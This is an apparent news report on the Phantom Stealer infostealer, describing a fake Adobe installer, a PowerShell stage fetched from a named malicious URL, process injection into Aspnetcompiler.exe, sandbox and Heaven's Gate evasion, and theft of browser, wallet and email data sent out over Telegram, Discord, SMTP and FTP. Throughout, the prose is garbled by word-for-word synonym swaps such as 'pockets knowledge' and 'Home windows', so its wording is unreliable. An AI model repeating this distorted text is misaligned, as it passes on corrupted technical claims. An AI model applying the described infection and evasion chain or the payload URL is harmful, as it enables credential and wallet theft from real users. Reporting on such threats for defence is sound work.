Phantom Stealer model 3.5 has emerged as a critical risk to customers worldwide, able to extracting delicate info together with passwords, browser cookies, bank card particulars, and cryptocurrency pockets knowledge.
This subtle malware operates via misleading packaging, usually disguised as reputable Adobe software program installers, making it troublesome for unaware customers to determine the hazard earlier than an infection happens.
The assault begins with a pretend Adobe 11.7.7 installer file, first recognized on October 29, 2025. The file is definitely an obfuscated XML doc containing embedded JavaScript code designed to set off a sequence of malicious actions.
When executed, the file downloads a PowerShell script from a distant server, setting the stage for deeper system compromise and knowledge assortment.
K7 Safety Labs researchers recognized that Phantom Stealer employs a multi-stage an infection mechanism that demonstrates important technical sophistication.
RC4 key and decryption (Supply – K7 Safety Labs)
The malware downloads an obfuscated PowerShell script from the URL positivepay-messages.com/file/ground.ps1, which executes with hidden attributes and bypassing safety insurance policies.
This script incorporates RC4-encrypted knowledge that, as soon as decrypted, reveals directions for loading a .NET meeting instantly into reminiscence.
Malware execution movement (Supply – K7 Safety Labs)
The second part entails the BLACKHAWK.dll injector, a important element that performs course of injection into the reputable Home windows utility Aspnetcompiler.exe.
This injection method hundreds malicious code right into a trusted system course of, permitting the stealer to function underneath the radar of safety software program.
The malware constantly displays whether or not Aspnetcompiler.exe is working at five-second intervals, guaranteeing persistent operation.
Course of Injection and Evasion Strategies
Phantom Stealer leverages superior evasion strategies to keep away from detection and evaluation. The malware implements quite a few anti-analysis checks, together with detection of digital machines, sandboxes, and monitoring instruments via suspicious username matching in opposition to a hardcoded record of 112 sandbox usernames.
base64 string (Supply – K7 Safety Labs)
If such environments are detected, the malware self-destructs by making a batch file that forcefully terminates its course of.
Most notably, the stealer makes use of Heavens Gate, a classy usermode-hook evasion method the place 32-bit processes transition to 64-bit execution mode.
This permits the malware to bypass 32-bit user-mode hooks and carry out native x64 syscalls instantly, accessing delicate knowledge with out triggering safety mechanisms designed to observe course of habits.
As soon as put in, Phantom Stealer extracts browser credentials, together with Chrome and Edge knowledge, by accessing encrypted databases and decrypting them utilizing extracted encryption keys.
The malware harvests cryptocurrency pockets credentials, Outlook e mail configurations, keylogged knowledge, and system info together with screenshots captured each 1000 milliseconds.
For knowledge exfiltration, the stealer employs a number of channels, together with SMTP, FTP protocols, and communication platforms like Telegram and Discord.
Stolen knowledge is organized with laptop names and timestamps, creating an organized repository of sufferer info prepared for malicious use.
Organizations ought to implement strong e mail filtering, common software program updates, and superior endpoint safety to defend in opposition to this evolving risk.
Observe us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most well-liked Supply in Google.
